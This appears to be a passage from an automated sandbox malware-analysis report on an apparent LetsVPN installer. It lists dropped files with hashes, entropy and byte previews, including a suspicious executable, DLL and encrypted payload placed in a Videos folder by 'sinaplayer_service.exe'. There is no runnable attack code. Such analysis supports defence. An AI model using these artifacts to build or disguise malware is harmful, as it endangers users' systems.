                                                                                                                                                                                                  Preview:L..................F.... ....-.D.D....:|.Z...-.D.D.. ............................P.O. .:i.....+00.../C:\.....................1......Y.{..PROGRA~2.........O.I.Y.{....................V........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1......Y.{..letsvpn.@......Y.{.Y.{..........................V.H.l.e.t.s.v.p.n.....b.2. ....YU4 .LetsPRO.exe.H......YU4.Y.{..............................L.e.t.s.P.R.O...e.x.e.......Y...............-.......X.............#......C:\Program Files (x86)\letsvpn\LetsPRO.exe..0.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.L.e.t.s.P.R.O...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........*................@Z|...K.J.........`.......X.......932923...........hT..CrF.f4... ..*......,...W..hT..CrF.f4... ..*......,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9

                                                                                                                                                                                                  C:\Users\user\Videos\24D30D1C~16\Gztcrf.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):258328
                                                                                                                                                                                                  Entropy (8bit):6.64001582449504
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:/BstfXX0BcNv96T+CZxJK30D62E9NTBqCmN1BIKXXuo:pI0Bc/Y5K3m62E9NTsCmNg2V
                                                                                                                                                                                                  MD5:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  SHA1:98377319160E6DA97FD6E5D97AFE2441E0FE21A6
                                                                                                                                                                                                  SHA-256:5C3A73321F59CDC28164D79E8B60ECC57A90FF398A2CDBDE2BB718C8E9500D23
                                                                                                                                                                                                  SHA-512:CC509C4F41F86C9191BF5FBB826A362FFEF2BC78046B99356F944F39A17ED1AB17A6286FFE6AD03C290F6BBCE492F0DE96954B4C1075B27771C491C2CA027156
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L....w.X.w.X.w.XN&_X.w.XN&`X.w.XN&]X.w.XN&aX.w.X...X.w.X...X.w.X.%`X.w.X.%]X.w.X.w.X.u.X.%aX.w.X.%[X.w.X.w.X.w.X.%^X.w.XRich.w.X................PE..L....D.V.........."..........$......W|............@.......................................@.................................Lf..................................D,..p................................4..@...............(....e..@....................text............................... ..`.rdata..............................@..@.data...0...........................@....rsrc...............................@..@.reloc..D,..........................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Videos\24D30D1C~16\SK.TXT

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):209725
                                                                                                                                                                                                  Entropy (8bit):7.999155296684028
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:3072:bV6ppx9d6U0IqLcls38CNNvbW0ZouvuEVjzR00GSMtIILB/FjzpajiE5liIw8/K+:84Ibls3BNvb9ouxk9BLDzKiMiQ/Ko+y9
                                                                                                                                                                                                  MD5:242BB7507E0B2A8038F847830F926FEC
                                                                                                                                                                                                  SHA1:C391FC67566884065EB8A16961E5405D5B44677B
                                                                                                                                                                                                  SHA-256:7BAB7993F44F9835A44FC93CCE3D513FCBAE2395DAC085DB7F0748B2A21CCA32
                                                                                                                                                                                                  SHA-512:E0E4A997638BF95A558EBB877A2D5E64F2D3A2D2A81D7F15C4453B194E18F3A5BC07589EDB3BC18FDCE1996CFB50B0B00D1FFDF421002E37608EB861F3E7D36C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.....q...*.j..|..q..f)...%...._..T02...i...L...59(]Sq`6..7...W.<=.K]:.qX...U......S..(cr".6...$.`......c.q8.-%>^Q1....8.j.|....FA..N...v..w..J...#&...*.......v...>.~..2O.5.rc.-....6.@...............*.eV>. :..Xh.-....+.xP.q.....]., ~1Q...K.'.....4...jO...........j.Q.>m...(..bc.u07.6.^{......A\..*Z.-.\.%.........w..Cs.6.........)O+KQ`.JT..m..k6...#M..r_H........0.%7.\Sa.Oq........J.p....6..H.g.P..&.:..ngm4.+...Z.y%V.O.e...h.h...........Zn......y...I......q.....a.k%.C['..+.>d.e.(.-.l..w..rM.I).E...5.>B/sQHh...f....E>.<..[.x.^..].....FO.Q.9|..`........O...L..l........;.Yx.,.Ft/xW}.V].A..c.......L....8...nt;:d1....z.-.&[..w..jR@~.)...L.D..............e:.+....,.z.(J....1.J..........).Wn....RA`.&.._..PH.....0'n6.2:e...1.J....i.?.KQ.X........D@# ..}&W.D...U.S....WE...Y.6b...*.<w.....M.y..;...v|..1.s...n..7V.........u.4.u.X>=....>..W.u..AZb......UM.&l8..+..K6U..^.6...I.[.:s..............'<J......j.>|r....8Z.w.H4........r...i.(..al...Y..X.i..y.#

                                                                                                                                                                                                  C:\Users\user\Videos\24D30D1C~16\base.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2482688
                                                                                                                                                                                                  Entropy (8bit):6.599322698372088
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:HymviY7ZdM+3023FbNifZoGlBP3+IoA7YRAt+RB48UOexIFQHkaS5Jv/PfT:HziCdt3023FbNifZ1D3+IoEt+RS8UOel
                                                                                                                                                                                                  MD5:72ADFBFC97B1F1E7ABA3F63CD264C0B2
                                                                                                                                                                                                  SHA1:93DFEBD64B0FC0AA932E23A5D4E6A32CEBE7CF32
                                                                                                                                                                                                  SHA-256:77762C479E46D1DF205EB020D4C1AF5CCD8E433111DC63BE53B2401C7B8257AC
                                                                                                                                                                                                  SHA-512:7AF6E43B7C6086646D1CAC37234658722ABDF466689AB58459468095722E66DB0ED008DA5B2F731D8FB28F60F52EA1FD0C3501C47A79678EB1F6392AF61CB004
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.*!..y!..y!..y(.xy-..y(.hy...y!..y..yN.ey...yN.Qy...yN.PyS..yN.Ty#..yN.`y ..yN.ay ..yN.fy ..yRich!..y................PE..L.../.cg...........!................M.........................................&.......&...@.....................................T....0#..0...................p#..U......................................@............................................text...n........................... ..`.rdata..............................@..@.data...<x.... ....... .............@....rsrc....0...0#..2...j".............@..@.reloc..JD...p#..F....".............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Videos\24D30D1C~16\msvcp120.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):455328
                                                                                                                                                                                                  Entropy (8bit):6.698367093574994
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                                                                                                                                                  MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                                                                                                                                                  SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                                                                                                                                                  SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                                                                                                                                                  SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Videos\24D30D1C~16\msvcr120.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):970912
                                                                                                                                                                                                  Entropy (8bit):6.9649735952029515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                                                                                  MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                                                                                  SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                                                                                  SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                                                                                  SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\INF\oem4.inf

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Windows\INF\setupapi.dev.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Generic INItialization configuration [BeginLog]
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58514
                                                                                                                                                                                                  Entropy (8bit):5.205553346342785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OGdni80C/8g0atRf7yr14ujuNY9AZi3Z/oUtwrP3UQGSE2546vek/LAAiaig4SU3:Own95cdyYloiwTyz25wk/ZiFSk
                                                                                                                                                                                                  MD5:B4502F5083883838B6FABB67BAF7EFD2
                                                                                                                                                                                                  SHA1:ADA8A6E5300D5B5D2B2EF024F6E6B29C226F65D6
                                                                                                                                                                                                  SHA-256:48966AC99217F865843C63237D2FF7039B9A4E065291671CCCFCF22B58D84B05
                                                                                                                                                                                                  SHA-512:A5BF4E69DE6260DFE3B3505E2C14A6997AD0857E4D7D64DE60C8F86458DFDF22FD52DD60158C162AA144AD99BA2447C65CB1707B0F0FC88FEBE5D5C30E8A0C13
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:[Device Install Log].. OS Version = 10.0.19045.. Service Pack = 0.0.. Suite = 0x0100.. ProductType = 1.. Architecture = amd64....[BeginLog]....[Boot Session: 2023/10/03 09:57:02.288]....>>> [Setup Import Driver Package - C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf]..>>> Section start 2023/10/03 09:57:37.904.. cmd: C:\Windows\System32\spoolsv.exe.. inf: Provider: Microsoft.. inf: Class GUID: {4D36E979-E325-11CE-BFC1-08002BE10318}.. inf: Driver Version: 06/21/2006,10.0.19041.1806.. inf: Catalog File: prnms009.cat.. ump: Import flags: 0x0000000D.. pol: {Driver package policy check} 09:57:37.920.. pol: {Driver package policy check - exit(0x00000000)} 09:57:37.920.. sto: {Stage Driver Package: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf: {Query Configurability: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf:

                                                                                                                                                                                                  C:\Windows\Logs\NetSetup\service.0.etl

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):589824
                                                                                                                                                                                                  Entropy (8bit):0.38537297996661046
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:qLZm8DmT1xMS92sICkjd0x5AUko5HOLboAcKYzFlgbmSBo:qLvM7mjhRoZO/oAPT+
                                                                                                                                                                                                  MD5:5787DB572B03088BD9651D5B760ECD16
                                                                                                                                                                                                  SHA1:4F05A9B32FAAEA469139DA20E74E4ED591E56813
                                                                                                                                                                                                  SHA-256:74F11533EB87312ADA4A6FB869231846C551D6FD5393FDD6C1F955DCE17D4F3B
                                                                                                                                                                                                  SHA-512:287CDE065A5B6D773A47FE7018034C2C488450CD0821BD27E068C4BFAB2D5E74073BCD7D6738F6D5C7DC8726BD721C2E6120199E131F58E312F6638A0CA127A1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:....8...8.......................................P...!....................................?......................eJ......g<l..Z..Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.6.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.6.1...........................................................@K5..............?..............N.e.t.C.f.g.T.r.a.c.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.N.e.t.S.e.t.u.p.\.s.e.r.v.i.c.e...0...e.t.l.........P.P..........?..................................................................8.B..?......19041.1.amd64fre.vb_release.191206-1406.....5.@..?.........gP.......U..l....NetSetupShim.pdb.b......7.@..?.......I.[.8+m.!N8$......NetSetupEngine.pdb......4.@..?.........>*.....Nr8..a....NetSetupApi.pdb.........4.@..?.........E_iC...F........NetSetupSvc.pdb.............................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC3A.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC4B.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC5C.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\oemvista.inf (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.cat (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.sys (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
